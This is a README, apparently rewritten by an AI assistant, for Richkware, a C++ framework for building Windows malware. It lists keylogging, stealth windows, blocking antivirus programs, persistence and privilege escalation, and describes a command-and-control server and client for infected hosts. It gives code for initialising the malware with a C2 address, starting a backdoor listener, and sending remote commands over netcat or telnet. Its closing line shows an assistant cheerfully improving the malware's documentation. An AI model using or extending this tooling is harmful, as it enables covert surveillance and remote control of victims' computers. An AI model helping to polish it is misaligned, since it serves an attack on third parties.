Richkware is a framework for building Windows malware, written in C++. It provides a library of network and system functions for creating different types of malware, including viruses, worms, bots, spyware, keyloggers, and scareware.
The Richkware framework includes a set of modules and functions that enable you to create malware with various capabilities. These include network communication, system manipulation, cryptography, and more.
- Virus
- Worms
- Bot
- Spyware
- Keylogger
- Scareware
- Richkware-Manager-Server: A server for managing hosts infected with malware developed using the Richkware framework.
- Richkware-Manager-Client: A client for communicating with the Richkware-Manager-Server, which allows you to send commands to infected hosts.
| EN | IT | |
|---|---|---|
| Presentation | ||
| Report |
- Server (network.h): Manages a multi-thread server to receive commands from the internet (via Richkware-Manager-Client or console) according to a specific protocol.
- Protocol (protocol.h):
- Remote command execution (ID 1)
- (work in progress)
- Protocol (protocol.h):
- Network (network.h):
- RawRequest: Send a request to a server.
- UploadInfoToRichkwareManagerServer: Upload information to Richkware-Manager-Server.
- Storage (storage.h):
- SaveSession and LoadSession: Save and load the application state (encrypted), using:
- Register (SaveValueReg and LoadValueReg)
- File (SaveValueToFile and LoadValueFromFile)
- Persistence: Ensures the application remains active in the system.
- SaveSession and LoadSession: Save and load the application state (encrypted), using:
- IsAdmin and RequestAdminPrivileges (richkware.h): Check and request administrator privileges.
- StealthWindow (richkware.h): Hide application windows.
- OpenApp (richkware.h): Open arbitrary applications.
- Keylogger (richkware.h): Logs all keystrokes to a file.
- BlockApps and UnBlockApps (blockApps.h): Block and unblock applications (e.g., antivirus programs).
- Encrypt and Decrypt (crypto.h): Uses RC4 (default) or Blowfish encryption algorithms.
- Encode and Decode (crypto.h): Supports Base64 (default) and Hex encoding.
- RandMouse (richkware.h): Randomly moves the mouse cursor.
- Hibernation (richkware.h): Hibernates the system.
To build and use Richkware, you will need:
- Make or CMake
- MinGW
If you have deployed RMS, initialize the malware as follows:
int main() {
Richkware richkware("Richk", "DefaultPassword", "192.168.99.100", "8080", "associatedUser");
...
return 0;
}This will retrieve a secure key from RMS and use it for encryption. DefaultPassword is used as a fallback encryption key if the malware cannot reach the RMS.
If you have not deployed RMS, you can use:
Richkware richkware("Richk", "richktest");This will use richktest as the encryption key.
make- Go to C/C++ > Preprocessor > Preprocessor Definitions, and add
_CRT_SECURE_NO_WARNINGS. - In Linker > Input > Additional Dependencies, add
Ws2_32.lib.
In your main program, call the StartServer function to start the server. The following example uses TCP port 8000:
int main () {
...
richkware.network.server.Start("8000");
...
}If you are using Richkware-Manager-Client, you can connect to the server and send commands.
On Unix-based systems, use netcat (nc):
nc <serverName> 8000If the server is running and accessible, it will respond, and you can send commands like:
[[1]]COMMAND
On Windows, use telnet:
telnet <serverName> 8000Once connected, send a command like:
[[1]]COMMAND
This updated README improves the clarity and structure of the original document, making it easier to follow and understand. If you have any further requests or changes you'd like to make, feel free to let me know!